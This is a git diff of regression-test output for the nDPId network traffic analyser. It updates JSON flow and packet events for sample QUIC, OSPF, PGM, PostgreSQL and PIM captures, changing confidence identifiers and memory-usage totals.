+00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1252,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1611427514609} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879726 bytes -~~ total memory freed........: 5879726 bytes -~~ total allocations/frees...: 118138/118138 +~~ total memory allocated....: 6013360 bytes +~~ total memory freed........: 6013360 bytes +~~ total allocations/frees...: 120900/120900 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2155 chars diff --git a/test/results/ospfv2_add_new_prefix.pcap.out b/test/results/ospfv2_add_new_prefix.pcap.out index a59322b4a..d6b63d574 100644 --- a/test/results/ospfv2_add_new_prefix.pcap.out +++ b/test/results/ospfv2_add_new_prefix.pcap.out @@ -2,9 +2,9 @@ 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1596626889276} 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1596626889276,"flow_last_seen":1596626889276,"flow_idle_time":620000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1596626889276,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1596626889276,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1596626889276,"pkt":"qrvMAAEwqrvMAAowCABFwABsAPoAAAFZj3MKAQoKCgEKAQIEAFisEAAKAAAABqsnAAAAAAAAAAAAAAAAAAEAASIBrBAACqwQAAqAAAASxYoAPAAAAAMKAAAK\/\/\/\/\/wMAAAGsEAAK\/\/\/\/\/wMAAAEKAQoKCgEKCgIAAAo="} -00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1596626889276,"flow_last_seen":1596626889276,"flow_idle_time":620000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1596626889276,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"ndpi": {"confidence": {"4":"DPI"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} +00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1596626889276,"flow_last_seen":1596626889276,"flow_idle_time":620000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1596626889276,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"ndpi": {"confidence": {"6":"DPI"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1596626891781,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1596626891781,"pkt":"qrvMAAowqrvMAAEwCABFwABAAqkAAAFZjfAKAQoBCgEKCgIFACwKAAABAAAABjO3AAAAAAAAAAAAAAABIgGsEAAKrBAACoAAABLFigA8"} -00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1596626889276,"flow_last_seen":1596626891781,"flow_idle_time":620000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1596626891781,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1596626889276,"flow_last_seen":1596626891781,"flow_idle_time":620000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1596626891781,"l3_proto":"ip4","src_ip":"10.1.10.10","dst_ip":"10.1.10.1","l4_proto":89,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"ospfv2_add_new_prefix.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":132,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1596626891781} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 477 chars ~~ json string max len.......: 655 chars diff --git a/test/results/pgm.pcap.out b/test/results/pgm.pcap.out index bc03e6b9f..3e8038a1a 100644 --- a/test/results/pgm.pcap.out +++ b/test/results/pgm.pcap.out @@ -2,10 +2,10 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1654564815455} 00538{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654564815455,"flow_last_seen":1654564815455,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654564815455,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1654564815455,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1654564815455,"pkt":"AQBeAAEviFH7P19UCABFAAA4C7VAABRxIuMK9ECa6wABL9YlAHsAAEcBCvRAmtYlACQAAaJCAFHoKABR6ecAAQAACvRAmg=="} -00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654564815455,"flow_last_seen":1654564815455,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654564815455,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"ndpi": {"confidence": {"4":"DPI"},"proto":"PGM","breed":"Acceptable","category":"Network"}} +00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654564815455,"flow_last_seen":1654564815455,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654564815455,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"ndpi": {"confidence": {"6":"DPI"},"proto":"PGM","breed":"Acceptable","category":"Network"}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1654564816295,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1654564816295,"pkt":"AQBeAAEviFH7P19UCABFAABzDnBAABRxH+0K9ECa6wABL9YlAHsEAAH0CvRAmtYlAF8AUenoAFHoKENTQQCABAAAbQAFAFBSSUNFAAAAAAAAAAAAAAAAAAAAAP\/\/AADXyjEBAQAAAAr0QJoAAAAANH8AAAAAAAABAAAAAQAAACoA"} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1654564816316,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1654564816316,"pkt":"AQBeAAEviFH7P19UCABFAABxDoBAABRxH98K9ECa6wABL9YlAHsEAE8tCvRAmtYlAF0AUenpAFHoKENTQQCABAAAbQADAExPRwAAAAAAAAAAAAAAAAAAAAD\/\/wAA18oxAQEAAAAK9ECaAAAAAEJ\/AAAAAAAAAQAAAAEAAAAqAA=="} -00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1000,"flow_first_seen":1654564815455,"flow_last_seen":1654564894361,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":162302,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1654564894361,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PGM","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"pgm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1000,"flow_first_seen":1654564815455,"flow_last_seen":1654564894361,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":162302,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1654564894361,"l3_proto":"ip4","src_ip":"10.244.64.154","dst_ip":"235.0.1.47","l4_proto":113,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"PGM","breed":"Acceptable","category":"Network"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"pgm.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":1000,"total-skipped-flows":0,"total-l4-payload-len":162302,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1654564894361} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1000/1000 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5898415 bytes -~~ total memory freed........: 5898415 bytes -~~ total allocations/frees...: 119113/119113 +~~ total memory allocated....: 6032049 bytes +~~ total memory freed........: 6032049 bytes +~~ total allocations/frees...: 121875/121875 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 653 chars diff --git a/test/results/pgsql.pcap.out b/test/results/pgsql.pcap.out index 9ca754239..12b6f6602 100644 --- a/test/results/pgsql.pcap.out +++ b/test/results/pgsql.pcap.out @@ -8,10 +8,10 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1103453983215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8vZZAAEAGfyN\/AAABfwAAAbNrFTjJAbC8AAAAAKACf\/8s3wAAAgRADAQCCAoTQg0qAAAAAAEDAwA="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1103453983215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAARU4s2vJSeIcyQGwvaASf\/9g+wAAAgRADAQCCAoTQg0qE0INKgEDAwA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1103453983215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1103453983215,"pkt":"AAAAAAAAAAAAAAAACABFAAA0vZdAAEAGfyp\/AAABfwAAAbNrFTjJAbC9yUniHYAQf\/\/KGAAAAQEIChNCDSoTQg0q"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983214,"flow_last_seen":1103453983217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983215,"flow_last_seen":1103453983217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1103453983214,"flow_last_seen":1103453998615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":1430,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1103453983215,"flow_last_seen":1103453983338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983214,"flow_last_seen":1103453983217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1103453983215,"flow_last_seen":1103453983217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1103453983217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1103453983214,"flow_last_seen":1103453998615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":1430,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45930,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1103453983215,"flow_last_seen":1103453983338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1103453998615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":45931,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":39,"source":"pgsql.pcap","alias":"nDPId-test","packets-captured":39,"packets-processed":39,"total-skipped-flows":0,"total-l4-payload-len":2103,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1103453998615} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 39/39 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875730 bytes -~~ total memory freed........: 5875730 bytes -~~ total allocations/frees...: 118159/118159 +~~ total memory allocated....: 6009364 bytes +~~ total memory freed........: 6009364 bytes +~~ total allocations/frees...: 120921/120921 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 685 chars diff --git a/test/results/pim.pcap.out b/test/results/pim.pcap.out index 8b7c0b222..40d6e1c37 100644 --- a/test/results/pim.pcap.out +++ b/test/results/pim.pcap.out @@ -2,10 +2,10 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1655247781655} 00540{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655247781655,"flow_last_seen":1655247781655,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1655247781655,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655247781655,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1655247781655,"pkt":"AQBeAAANUC+oqN+8CABFwABKmKkAAAFns0PAqMvq4AAADSMAIEwBAMCoy+kAAgDSAQAAIOY+QvwAAQAAAQAHIAql5gIBAAAg5jwrAwABAAABAAcgCqXmAg=="} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655247781655,"flow_last_seen":1655247781655,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1655247781655,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_PIM","breed":"Acceptable","category":"Network"}} +00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655247781655,"flow_last_seen":1655247781655,"flow_idle_time":620000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1655247781655,"l3_proto":"ip4","src_ip":"192.168.203.234","dst_ip":"224.0.0.13","l4_proto":103,"ndpi": {"confidence": {"6":"DPI"},"proto":"IP_PIM","breed":"Acceptable","category":"Network"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655247782655,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1655247782655,"pkt":"AQBeAAANUC+oqN+8CABFwABKmKoAAAFns0LAqMvq4AAADSMAIFYBAMCoy+kAAgDSAQAAIOY+QvsAAQAAAQAHIAql5gIBAAAg5jwq+gABAAABAAcgCqXmAg=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pim.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655247783655,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1655247783655,"pkt":"AQBeAAANUC+oqN+8CABFwABKmKsAAAFns0HAqMvq4AAADSMALUsBAMCoy+kAAgDSAQAAIOY+QvoAAQAAAQAHIAql5gIBAAAg5jweBgABAAABAAcgCqXmAg=="} 